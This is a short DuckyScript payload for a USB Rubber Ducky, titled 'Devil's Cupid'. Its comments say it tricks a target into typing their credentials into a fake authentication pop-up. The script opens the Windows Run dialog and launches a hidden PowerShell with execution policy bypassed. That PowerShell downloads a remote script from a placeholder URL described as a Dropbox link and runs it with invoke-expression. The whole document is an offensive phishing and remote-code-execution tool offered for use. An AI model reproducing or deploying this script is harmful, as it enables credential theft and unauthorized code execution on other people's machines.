REM Author: Nejc Pirečnik
REM Devil's Cupid
REM The Devil's Cupid is a Rubber Ducky script that tricks your target into sharing their credentials through a fake authentication pop up message.
DEFINE #DROPBOX_URL example.com
REM You must replace the URL end with ?dl=1!
DELAY 1000
GUI r
DELAY 500
STRING powershell -w h -NoP -NonI -Exec Bypass $pl = iwr #DROPBOX_URL; invoke-expression $pl
ENTER